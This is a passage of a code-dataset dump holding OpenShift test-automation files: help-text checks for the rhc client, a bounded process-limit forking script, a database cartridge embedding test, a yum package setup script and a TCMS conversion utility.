convert_script_to_cls('Collections.Demo.demo_03')\n print val\n\n" }, { "alpha_fraction": 0.5347558856010437, "alphanum_fraction": 0.5360491275787354, "avg_line_length": 28.740385055541992, "blob_id": "ab2f1ef638781e047badd40c66d2ea31b5bd4a2f", "content_id": "c5a1398173ccdbe5deaa75bd1f005040468a6ad1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6186, "license_type": "no_license", "max_line_length": 99, "num_lines": 208, "path": "/automation/open/testmodules/RT/client/man_pages.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nAug 2, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport re\n\n\nclass ManPageTest(rhtest.Test):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.testcase_summary = '[rhc-client]man page and help check for all client commands'\n\n def finalize(self):\n pass\n\n def log_message(self, pattern, status):\n self.info(\"Pattern '%s'... %s\" % ( pattern, status ))\n\n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput(\"man %s | col -b\" % self.command)\n if ret_code == 0:\n return ret_output\n else:\n return None\n\n def test_method(self):\n # Gettng the man page\n output = self.get_output()\n\n # Checking patterns in the output\n missing_patterns = [ ]\n for pattern in self.pattern_list:\n result = \"OK\"\n match = re.search(pattern, output)\n if not match:\n result = \"FAIL\"\n missing_patterns.append(pattern)\n self.log_message(pattern, result)\n\n # Assertion\n self.info('Asserting that the number of missing patterns is 0')\n self.assert_equal(len(missing_patterns), 0)\n\n # Everythng is OK\n return self.passed(\" - \".join([ self.testcase_summary, self.command ]))\n \n\n#class RhcTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'rhc'\n# self.pattern_list = [\n# 'alias', 'cartridge', 'domain', 'app', 'sshkey', \n# 'port-forward', 'setup', 'server', 'snapshot', 'tail', 'threaddump'\n# ]\n\nclass RhcHelpTest(ManPageTest):\n\n def initialize(self):\n self.command = 'rhc'\n self.pattern_list = [\n 'alias', 'cartridge', 'domain', 'app', 'sshkey', \n 'port-forward', 'setup', 'server', 'snapshot', 'tail', 'threaddump'\n ]\n\n\n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput('rhc help')\n return ret_output\n\n\n#class RhcDomainTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'rhc-domain'\n# self.pattern_list = [\n# 'create', 'update', 'show', 'status', 'delete',\n# '-l', '--rhlogin', '-p', '--password', '-d', '--debug', '-h', '--help',\n# '--config', '--timeout', '--noprompt', '-v', '--version'\n# ]\n\nclass RhcDomainHelpTest(ManPageTest):\n\n def initialize(self):\n self.command = 'rhc domain'\n self.pattern_list = [\n 'create', 'update', 'show', 'status', 'delete',\n '-l', '--rhlogin', '-p', '--password', '-d', '--debug', '-h', '--help',\n '--config', '--timeout', '--noprompt', '-v', '--version'\n ]\n \n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput('rhc help domain')\n return ret_output\n\n#class RhcAppTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'rhc-app'\n# self.pattern_list = [\n# 'reload', 'tidy', 'git-clone', 'delete', \n# 'create', 'start', 'stop', 'restart',\n# 'force-stop', 'status', 'show', '-l', '--rhlogin',\n# '-p', '--password', '-d', '--debug',\n# '--noprompt', '--config', '-h', '--help',\n# '-v', '--version', '--timeout'\n# ]\n\nclass RhcAppHelpTest(ManPageTest):\n\n def initialize(self):\n self.command = 'rhc app'\n self.pattern_list = [\n 'reload', 'tidy', 'git-clone', 'delete', \n 'create', 'start', 'stop', 'restart',\n 'force-stop', 'status', 'show', '-l', '--rhlogin',\n '-p', '--password', '-d', '--debug',\n '--noprompt', '--config', '-h', '--help',\n '-v', '--version', '--timeout'\n ]\n\n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput('rhc help app')\n return ret_output\n\n\n#class RhcSshkeyTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'rhc-sshkey'\n# self.pattern_list = [\n# 'list', 'add', 'show', 'remove', '-l', '-p', '-d', '-h','-v',\n# '--config', '--timeout', '--noprompt'\n# ]\n\nclass RhcSshkeyHelpTest(ManPageTest):\n\n def initialize(self):\n self.command = 'rhc sshkey'\n self.pattern_list = [\n 'list', 'add', 'show', 'remove', '-l', '-p', '-d', '-h','-v',\n '--config', '--timeout', '--noprompt'\n ]\n \n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput('rhc help sshkey')\n return ret_output\n\n\n#class RhcPortForwardTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'rhc port-forward'\n# self.pattern_list = [\n# '-l', '--rhlogin', '-p', '--password', '-a', '--app', '-d', \n# '-h', '--help', '--config', '--timeout'\n# ]\n\n\nclass RhcPortForwardHelpTest(ManPageTest):\n def initialize(self):\n self.command = 'rhc port-forward'\n self.pattern_list = [\n '-l', '--rhlogin', '-p', '--password', '-a', '--app', '-d', \n '-h', '--help', '--config', '--timeout'\n ]\n \n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput('rhc help port-forward')\n return ret_output\n\n\n#class ExpressConfTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'express.conf'\n# self.pattern_list = [\n# 'Search order', 'libra_server', 'ssh_key_file', 'debug', 'timeout', 'default_rhlogin'\n# ]\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n #suite.add_test(RhcTest)\n suite.add_test(RhcHelpTest)\n #suite.add_test(RhcDomainTest)\n suite.add_test(RhcDomainHelpTest)\n #suite.add_test(RhcAppTest)\n suite.add_test(RhcAppHelpTest)\n #suite.add_test(RhcSshkeyTest)\n suite.add_test(RhcSshkeyHelpTest)\n #suite.add_test(RhcPortForwardTest)\n suite.add_test(RhcPortForwardHelpTest)\n #suite.add_test(ExpressConfTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5136112570762634, "alphanum_fraction": 0.5166769027709961, "avg_line_length": 27.765432357788086, "blob_id": "34b7c2740005f4934f63582d5d11303e4761fcaa", "content_id": "4417fa6294721e92f8718fd9ba15ed6f4fe86d87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16310, "license_type": "no_license", "max_line_length": 126, "num_lines": 567, "path": "/automation/open/testmodules/RT/limits/app_template/multifork.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nThis is a template Python script. It contains boiler-plate code to define and\nhandle values needed to run the script. \n\nDefault values are defined in the dictionary \"defaults\". \nOptions are defined in the list \"test_options\"\n\n\n\"\"\"\n\n# ==============================================================================\n#\n# MODULES - Libraries needed to perform the task\n#\n# ==============================================================================\n\n\n\n# Prepare default output mechanism\nimport logging\n\n# Access to getenv for default overrides\nimport os\n\n# Allow exit control\nimport sys\n\n# for sleep and debug reports\nimport time\n\n# Objects for CLI argument processing\nfrom optparse import OptionParser, Option\n\n# =======================\n# Add test specific modules here\n# =======================\n\n# send and recieve control signals\nfrom signal import signal, alarm, SIG_IGN, SIG_DFL, SIGINT, SIGALRM, SIGTERM\n\n# maxint on 64 bit is too big for sleep.\nmaxsleep = pow(2, 31) -1\n\n# =============================================================================\n#\n# OPTIONS - initializing the script execution parameters\n#\n# =============================================================================\n\n#\n# Values to use if no explicit input is given\n#\ndefaults = {\n 'debug': False,\n 'verbose': False,\n 'duration': 5,\n 'count': 1,\n 'sleep': maxsleep, # maxint on 64 bit is too big for sleep\n 'daemon': False,\n 'logfile': None,\n 'pidfile': None,\n 'format': \"text\"\n}\n\n# Check for default overrides from the environment.\n# environment variable names are upper case versions of the default keys.\nfor key in defaults:\n value = os.getenv(\"MULTIFORK_\" + key.upper())\n if value is not None:\n defaults[key] = value\n\n# Options which all scripts must have.\n# Defaults may be inserted from the defaults dictionary defined above.\ndefault_options = (\n Option(\"-d\", \"--debug\", action=\"store_true\", default=defaults['debug'],\n help=\"enable debug logging\"),\n Option(\"-v\", \"--verbose\", action=\"store_true\", default=defaults['verbose'],\n help=\"enable verbose logging\"),\n Option(\"-n\", \"--dryrun\", dest=\"liverun\", action=\"store_false\", \n default=True,\n help=\"run logic only, no side effects\"),\n Option(\"-D\", \"--duration\", default=defaults['duration'], type=\"int\",\n help=\"run for the specified time in seconds\"),\n Option(\"-c\", \"--count\", default=defaults['count'], type=\"int\",\n help=\"run the number of processes requested\"),\n Option(\"-s\", \"--sleep\", default=defaults['sleep'], type=\"int\",\n help=\"sleep time for child processes\"),\n Option(None, \"--daemon\", default=defaults['daemon'], action=\"store_true\",\n help=\"run in the background\"),\n Option(\"-l\", \"--logfile\", default=defaults['logfile'],\n help=\"where to place log output\"),\n Option(\"-f\", \"--format\", default=defaults['format'], type=\"choice\",\n choices=['text', 'html', 'xml', 'json'],\n help=\"how to format logging output\"),\n Option(\"-p\", \"--pidfile\", default=defaults['pidfile'],\n help=\"location of a pid file if running in daemon mode\")\n)\n\n\n# CLI arguments specifically for this test. Add them as needed\ntest_options = (\n\n)\n\nall_options = default_options + test_options\n\n\n#\n# A header for each log output format\n#\nheaderformat = {\n 'text':\n\"\"\"---- Multifork Report: PID %d----\n-------------------------------------------------------------------------------\n\"\"\",\n\n 'html':\n \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n <head>\n <title>Multifork Report</title>\n <style type=\"text/css\">\n table { border-style : solid ; border-width : 2px ; }\n </style>\n </head>\n <body>\n <!-- PID = %d -->\n <h1>Multifork Report</h1>\n\"\"\",\n\n 'xml':\n \"\"\"<runreport title=\"multifork\" process=\"%d\">\n <logentries>\n\"\"\",\n\n 'json':\n \"\"\"{ \"title\": \"multifork\",\n \"process\": %d,\n \"logs\": [\n\"\"\"\n }\n\n# write the invocation/runtime parameters and run context information\nintroformat = {\n 'text': \n \"\"\"Daemon: %s\nDuration: %d seconds\nCount: %d children\nSleep: %d seconds\nLog File: %s\nPID File: %s\n--------------------------------------------------------------------------------\n\"\"\",\n\n 'html':\n \"\"\"<table class=\"summary\">\n <caption>Invocation</caption>\n <tr><th>Name</th><th>Value</th></tr>\n <tr><td>Daemon</td><td>%s</td></tr>\n <tr><td>Duration (sec)</td><td>%d</td></tr>\n <tr><td>Count (procs)</td><td>%d</td></tr>\n <tr><td>Sleep (sec)</td><td>%d</td></tr>\n <tr><td>Log File</td><td>%s</td></tr>\n <tr><td>PID FIle</td><td>%s</td></tr>\n</table>\n<table class=\"logs\">\n <caption>Event Log</caption>\n <tr>\n <th>PID</th>\n <th>Name</th>\n <th>Log Level</th>\n <th>Date/Time</th>\n <th>Message</th>\n </tr>\n\"\"\",\n\n 'xml':\n \"\"\"<invocation daemon=\"%s\" duration=\"%d\" count=\"%d\" sleep=\"%d\" logfile=\"%s\" pidfile=\"%s\">\n</invocation>\n\"\"\",\n\n 'json':\n \"\"\"\n[ \"invocation\" ]\n\"\"\" \n }\n\n#\n# A log entry format for each output method\n#\nlogformat = {\n 'text': \"\"\"%(levelname)s:%(name)s:%(process)s: %(message)s\"\"\",\n\n 'html': \n\"\"\"<tr class=\"logentry\">\n <td class=\"process\">%(process)s</td>\n <td class=\"logname\">%(name)s</td>\n <td class=\"loglevel\">%(levelname)s</td>\n <td class=\"datetime\">%(asctime)s</td>\n <td class=\"message\">%(message)s</td>\n</tr>\"\"\",\n\n 'xml': \n\n\"\"\"<logentry pid='%(process)s' name='%(name)s' level='%(levelname)s' time='%(asctime)s' >\n%(message)s\n</logentry>\"\"\",\n\n 'json':\n\n\"\"\"{\n \"pid\": \"%(process)s\",\n \"level\": \"%(levelname)s\",\n \"name\": \"%(name)s\",\n \"time\": \"%(asctime)s\",\n \"message\": \"%(message)s\"\n},\"\"\"\n }\n\nsummaryformat = {\n 'text': \n \"\"\"--------------------------------------------------------------------------------\nsummary\n\"\"\",\n\n 'html':\n \"\"\" </table>\n<table class=\"summary\">\n <caption>Summary</caption>\n <tr><th>Name</th><th>Value</th></tr>\n <tr><td>Start Time</td><td>-</td></tr>\n <tr><td>End Time</td><td>-</td></tr>\n <tr><td>Duration</td><td>-</td></tr>\n</table>\n\n\"\"\",\n \n 'xml': \n \"\"\"<summary>\n</summary>\n\"\"\",\n\n 'json':\n\"\"\"summary = [ \n],\n\"\"\"\n\n }\n\n#\n# A footer format for each log output format\n#\nfooterformat = {\n 'text': \n \"\"\"--------------------------------------------------------------------------------\n\"\"\",\n \n 'html':\n \"\"\"\n </body>\n</html>\n\"\"\",\n \n 'xml':\n \"\"\" </logentries>\n</runreport>\n\"\"\",\n \n 'json':\n \"\"\" ]\n}\n\"\"\"\n \n }\n\n\n\n\n#\n# sample take from:\n# http://www.noah.org/wiki/Daemonize_Python\n#\ndef daemonize (stdin='/dev/null', stdout='/dev/null', stderr='/dev/null',\n pidfile=None):\n\n '''This forks the current process into a daemon. The stdin, stdout, and\n stderr arguments are file names that will be opened and be used to replace\n the standard file descriptors in sys.stdin, sys.stdout, and sys.stderr.\n These arguments are optional and default to /dev/null. Note that stderr is\n opened unbuffered, so if it shares a file with stdout then interleaved\n output may not appear in the order that you expect. '''\n\n # flush any pending output before forking\n sys.stdout.flush()\n sys.stderr.flush()\n\n # Do first fork.\n try: \n pid = os.fork() \n if pid > 0:\n sys.exit(0) # Exit first parent.\n except OSError, e: \n sys.stderr.write (\"fork #1 failed: (%d) %s\\n\" % (e.errno, e.strerror) )\n sys.exit(1)\n\n # Decouple from parent environment.\n os.chdir(\"/\") \n os.umask(0) \n os.setsid() \n\n\n # Do second fork.\n try: \n pid = os.fork() \n if pid > 0:\n sys.exit(0) # Exit second parent.\n except OSError, e: \n sys.stderr.write (\"fork #2 failed: (%d) %s\\n\" % (e.errno, e.strerror) )\n sys.exit(1)\n\n # Now I am a daemon!\n logger.debug(\"I am a daemon\")\n # if the caller asked for a pidfile, write it\n if pidfile:\n logger.debug(\"writing PID file %s\" % pidfile)\n pf = file(pidfile, \"w\")\n pf.write(\"%d\\n\" % os.getpid())\n pf.close()\n\n # Redirect standard file descriptors.\n if stdin:\n si = file(stdin, 'r')\n os.dup2(si.fileno(), sys.stdin.fileno())\n \n if stdout:\n so = file(stdout, 'a+')\n os.dup2(so.fileno(), sys.stdout.fileno())\n\n if stderr:\n se = file(stderr, 'a+', 0)\n os.dup2(se.fileno(), sys.stderr.fileno())\n\n\n# ===========================================================================\n#\n# Process functions\n#\n# ===========================================================================\nclass ProcessList(object):\n\n def __init__(self):\n self._complete = False\n self._processes = []\n self._duration = None\n self._count = None\n self._maxprocs = None\n self._child = False\n\n def activate(self, duration=10, count=0, sleep=maxsleep):\n\n logger = logging.getLogger(self.__class__.__name__ + \".activate\")\n\n self._duration = duration\n self._count = count\n self._sleep = sleep\n self._maxprocs = self._count\n\n signal(SIGALRM, self.finish)\n signal(SIGINT, self.abort)\n signal(SIGTERM, self.abort)\n\n alarm(self._duration)\n\n loop = 0\n while not self._child and not self._complete:\n # create processes until you reach max\n while len(self._processes) < self._maxprocs and not self._child:\n self.spawn()\n\n # max processes reached: wait for one to end\n if len(self._processes) > 0:\n logger.info(\"%d processes running\" % len(self._processes))\n try:\n (cpid, cstatus, rusage) = os.wait3(0)\n logger.debug(\"process %d completed with status %d\" % (cpid, cstatus))\n except OSError, e:\n if e.errno == 4:\n # alarm went off\n logger.debug(\"alarm woke me from wait\")\n else:\n raise\n \n # remove remaining processes\n self.shutdown()\n logger.info(\"run complete: procs requested: %d, max: %d\" % (self._count, self._maxprocs))\n\n def spawn(self):\n # create more\n logger = logging.getLogger(self.__class__.__name__ + \".spawn\")\n\n try:\n newpid = os.fork()\n except OSError, e:\n if e.errno == 11:\n # no more processes\n self._maxprocs = len(self._processes)\n logger.debug(\"Maximum processes reached: %d\" % self._maxprocs)\n return\n else:\n # no one expects something else\n raise\n\n if newpid == 0:\n self.child()\n return\n \n logger.debug(\"new child #%d, pid = %d\" % (len(self._processes), newpid))\n self._processes.append(newpid)\n\n def child(self):\n # a child: just go to sleep and exit when done\n # children should have no more child processes\n logger = logging.getLogger(self.__class__.__name__ + \".child\")\n\n self._child = True\n signal(SIGALRM, SIG_IGN)\n self._processes = []\n self._complete = True\n logger.debug(\"sleeping %d sec\" % self._sleep)\n time.sleep(self._sleep)\n logger.debug(\"exiting\")\n sys.exit(0)\n\n def abort(self, signum, frame):\n if not self._child:\n logger.info(\"recieved external interrupt\")\n self.finish(signum, frame)\n\n def finish(self, signum, frame):\n \"\"\"Terminate all pending processes\"\"\"\n logger = logging.getLogger(self.__class__.__name__ + \".finish\")\n logger.debug(\"caught signal %d\" % signum)\n\n # ignore the timer\n signal(SIGALRM, SIG_IGN) \n\n self._complete = True\n\n def shutdown(self):\n \"\"\"Kill and reap all of the processes in the list\"\"\"\n # don't respond to children, we're going to wait for them explicitly\n logger = logging.getLogger(self.__class__.__name__ + \".shutdown\")\n\n while len(self._processes) > 0:\n pid = self._processes[0]\n logger.debug(\"%d processes remaining\" % len(self._processes))\n logger.debug(\"terminating process %d\" % pid)\n\n # terminate the process\n try:\n os.kill(pid, SIGTERM)\n except OSError, e:\n print \"Error killing process %d: %s\" % (pid, e.message)\n \n\n # reap the process\n try:\n logger.debug(\"waiting for process %d\" % pid)\n (cpid, cstatus, cresource) = os.wait3(0)\n if pid != cpid:\n logger.warning(\"reaped process %d, expected %d\" % (cpid, pid))\n # don't do anything with pid 0\n if cpid != 0:\n # delete this child process from the active list\n logger.debug(\"removing pid %d from process list\" % cpid)\n i = self._processes.index(cpid)\n del self._processes[i]\n else:\n logger.debug(\"process %d not waiting for reaping\" % pid)\n except OSError, e:\n print \"Error waiting for process %d: %s\" % (pid, e.message)\n\n# ============================================================================\n#\n# MAIN - Script Body\n#\n# ============================================================================\n\nif __name__ == \"__main__\":\n\n\n # ======================================================================\n # Environment and Command Line Processing\n # ======================================================================\n\n # Process command line arguments\n (opt, args) = OptionParser(option_list=all_options).parse_args()\n\n if opt.daemon:\n logger.warning(\"daemonizing\")\n daemonize(\"/dev/null\", opt.logfile, opt.logfile, pidfile=opt.pidfile)\n\n if opt.logfile:\n # create a file handler with the requested file\n \n logging.basicConfig(\n level=logging.INFO, \n format=logformat[opt.format], \n datefmt=\"%Y%m%d-%H:%M:%S-%Z\",\n filename=opt.logfile\n )\n f = file(opt.logfile, 'a')\n f.write(headerformat[opt.format] % os.getpid())\n f.write(introformat[opt.format] % (opt.daemon, opt.duration, opt.count, opt.sleep, opt.logfile, opt.pidfile))\n # be sure the output buffer is empty before forking or it prints twice\n f.flush()\n f.close()\n\n else:\n logging.basicConfig(level=logging.INFO,\n format=logformat[opt.format], \n datefmt=\"%Y%m%d-%H:%M:%S-%Z\",\n stream=sys.stdout\n )\n sys.stdout.write(headerformat[opt.format] % os.getpid())\n sys.stdout.write(introformat[opt.format] % (opt.daemon, opt.duration, opt.count, opt.sleep, opt.logfile, opt.pidfile))\n sys.stdout.flush()\n # be sure the output buffer is empty before forking or it prints twice\n\n # Define the main program logger\n logger = logging.getLogger(\"multifork\")\n\n if opt.verbose:\n logging.root.setLevel(logging.INFO)\n logger.setLevel(logging.INFO)\n logger.info(\" enabled verbose logging\")\n\n # Enable debug output if the user has requested it\n if opt.debug:\n logging.root.setLevel(logging.DEBUG)\n logger.setLevel(logging.DEBUG)\n logger.debug(\" enabled debug logging\")\n\n # =======================================================================\n # Begin Task Logic\n # =======================================================================\n\n logger.debug(\"Forking %d times for %d seconds\" %\n (opt.count, opt.duration)\n )\n\n plist = ProcessList()\n\n plist.activate(opt.duration, opt.count)\n\n if opt.logfile:\n f = file(opt.logfile, \"a\")\n f.write(summaryformat[opt.format])\n f.write(footerformat[opt.format])\n f.close()\n else:\n sys.stdout.write(summaryformat[opt.format])\n sys.stdout.write(footerformat[opt.format])\n\n if opt.daemon and opt.pidfile:\n os.unlink(opt.pidfile)\n" }, { "alpha_fraction": 0.5237573385238647, "alphanum_fraction": 0.5310672521591187, "avg_line_length": 40.76335906982422, "blob_id": "7248760368425c1f414ed6c886dad77dd9466fc0", "content_id": "246c56ef848d62fdb18c0909e71fd4bdb820870b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5472, "license_type": "no_license", "max_line_length": 119, "num_lines": 131, "path": "/automation/open/testmodules/RT/cartridge/postgresql_and_mysql_in_the_same_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nFeb 9, 2012\n\n[US1386][Runtime][rhc-cartridge]Shouldn't be able to embed PostgreSQL and MySQL in the same app\nhttps://tcms.engineering.redhat.com/case/129309/\n\"\"\"\n\nimport os\nimport sys\n\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary =\"[US1386][Runtime][rhc-cartridge]Shouldn't be able to embed PostgreSQL and MySQL in the same app\"\n self.testcase_id = 129309\n try:\n test_name = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php` as default.\")\n test_name = 'php'\n self.app_type = common.app_types[test_name]\n self.app_name = 'myTestingApp'\n self.steps= []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass PostgresqlAndMysqlInTheSameApp(OpenShiftTest):\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\n 'Creating an application',\n common.create_app,\n function_parameters = [ self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n 'Embedding MySQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['mysql'] ), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'MySQL cartridge should be embedded successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n 'Embedding PostgreSQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['postgresql'] ), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'PostgreSQL 8.4 cartridge should NOT be embedded successfully',\n expect_return = \"!0\"))\n\n self.steps.append(testcase.TestCaseStep(\n 'Removing MySQL cartrdige',\n common.embed,\n function_parameters = [ self.app_name,\n 'remove-%s' % ( common.cartridge_types['mysql'] ),\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'MySQL cartrdige should be removed successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n 'Embedding PostgreSQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['postgresql'] ), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'PostgreSQL 8.4 cartridge should be embedded successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n 'Embedding MySQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['mysql'] ), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'MySQL 5.1 cartridge should NOT be embedded successfully',\n expect_return = \"!0\"))\n\n self.steps.append(testcase.TestCaseStep(\n 'Embedding Cron',\n common.embed,\n function_parameters = [ self.app_name,\n 'add-%s' % ( common.cartridge_types['cron'] ),\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'Cron cartridge should be embed successfully',\n expect_return = 0))\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PostgresqlAndMysqlInTheSameApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.648622989654541, "alphanum_fraction": 0.666191816329956, "avg_line_length": 28.25, "blob_id": "f4a005443b89582a11fedc150f8f3552cb7266ad", "content_id": "eedd5a38933d5968a376b2ad0b9563116a4515d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 2106, "license_type": "no_license", "max_line_length": 535, "num_lines": 72, "path": "/automation/open/bin/setup.rb", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env ruby\n#\n# Username must be root\n#username = `whoami`\n#if username != 'root'\n# puts \"This script can only be executed by root\"\n# exit 255\n#end\n\nmodule Setup\n RHTEST_HOME = File.expand_path(File.dirname(__FILE__)) + File::SEPARATOR + \"..\" + File::SEPARATOR\n OS_HASH = { :fedora17 => /fedora.*17/i,\n :fedora16 => /fedora.*16/i,\n :rhel => /Red Hat Enterprise Linux/i,\n :ubuntu12 => /ubuntu.*12/i,}\n YUM_PACKAGES = \"git python-sqlobject expect firefox chromium postgresql postgresql-devel rubygem-rails perl-ExtUtils-MakeMaker perl-Module-Build maven3 gcc gcc-c++ rubygem-sqlite3 rubygem-rack-mount sqlite-devel rubygem-pg mongodb krb5-workstation httpd-tools python-pip python-paramiko python-kerberos python-selenium java-1.7.0-openjdk ruby-devel python-devel perl-devel mysql-devel spawn patch readline readline-devel zlib zlib-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison iconv-devel\"\n RUBY_VERSIONS = [\"1.8.7\", \"1.9.3\"]\n\n def setup_env_var\n ENV['RHTEST_HOME'] = Setup::RHTEST_HOME\n end\n\n def detect_os\n file = File.new('/etc/issue', 'r')\n content = file.read\n file.close\n Setup::OS_HASH.each do |key, value|\n match = value.match(content)\n if Regexp.last_match\n return key\n end\n end\n return nil\n end\n\n def install_packages(os_type)\n puts \"Install packages using yum/apt-get\"\n if os_type == :fedora16\n packages = Setup::YUM_PACKAGES\n packages += \" rhc\"\n elsif os_type == :fedora17\n packages = Setup::YUM_PACKAGES\n end\n if os_type == :fedora16 or os_type == :fedora17\n output = `yum install -y #{packages}`\n end\n if $?.exitstatus != 0\n puts \"Failed to install yum packages\"\n return false\n else\n return true\n end\n end\n\n def setup_rvm\n end\n\n def setup_python_virtualenv\n end\nend\n\n\ninclude Setup\n# Setup environment variables\nSetup::setup_env_var\n# Detect OS type\nos_type = Setup::detect_os\nif os_type\n puts \"Your OS type is: #{os_type}\"\nelse\n puts \"Failed to detect your OS type\"\nend\n" }, { "alpha_fraction": 0.6428972482681274, "alphanum_fraction": 0.6440201997756958, "avg_line_length": 33.230770111083984, "blob_id": "d49b2d5eb778496233e7e0d3868398edcfc74ccd", "content_id": "f32afc9c545df1243e5fb6a43665b276ffb6e60e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1781, "license_type": "no_license", "max_line_length": 90, "num_lines": 52, "path": "/automation/open/bin/convert_script.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport tcms_base\nimport logging, logging.handlers\nimport sys\nfrom optparse import OptionParser\n\ndef config_logger():\n # create formatter\n formatter = logging.Formatter(\"%(levelname)s [%(asctime)s] %(message)s\",\n \"%H:%M:%S\")\n logger = logging.getLogger(\"dump_logs\")\n log_formatter = logging.Formatter(\n \"%(name)s: %(asctime)s - %(levelname)s: %(message)s\")\n \n stream_handler = logging.StreamHandler(sys.stdout)\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(logging.DEBUG)\n file_handler = logging.FileHandler('out.log')\n\n logger.setLevel(logging.INFO)\n logger.addHandler(stream_handler)\n logger.addHandler(file_handler)\n return logger\n\nlog = config_logger()\nparser = OptionParser()\n\ndef config_parser():\n # these are required options.\n parser.add_option(\"-t\", \"--testplan\", default='Test Plan for OpenShift 2.0', \n help=\"target testplan to update\")\n parser.add_option(\"-a\", \"--action\", default='convert',\n help=\"action you want to take (convert|revert)\")\n parser.add_option(\"-c\", \"--case_id\", default=None, help=\"testcase id to be converted\")\n (options, args) = parser.parse_args()\n \n return options, args\n\nif __name__ == '__main__':\n (options, args)= config_parser()\n \n if options:\n testplan_name = options.testplan\n tcms_obj = tcms_base.TCMS(test_plan=testplan_name)\n if options.action == 'convert':\n tcms_base.update_script_field_to_json_format(tcms_obj, options.case_id)\n \n elif options.action == 'revert':\n tcms_base.revert_script_field_to_python_format(tcms_obj, options.case_id)\n else:\n log.info(\"No action defined, must be convert or revert\") \n" }, { "alpha_fraction": 0.6407147645950317, "alphanum_fraction": 0.647734522819519, "avg_line_length": 30.979591369628906, "blob_id": "5df5162df09d7805e6fa77ba79b72842d207d867", "content_id": "1f02886c970cf2523d0d3e81f88aa4bdf0fe5e17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1567, "license_type": "no_license", "max_line_length": 111, "num_lines": 49, "path": "/automation/open/testmodules/RT/hot_deploy/jbossas_prebuilt_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 7, 2012\n\n\"\"\"\nimport os\nimport shutil\nimport rhtest\nimport common\nfrom jbossas_exploded_wars_without_jenkins import 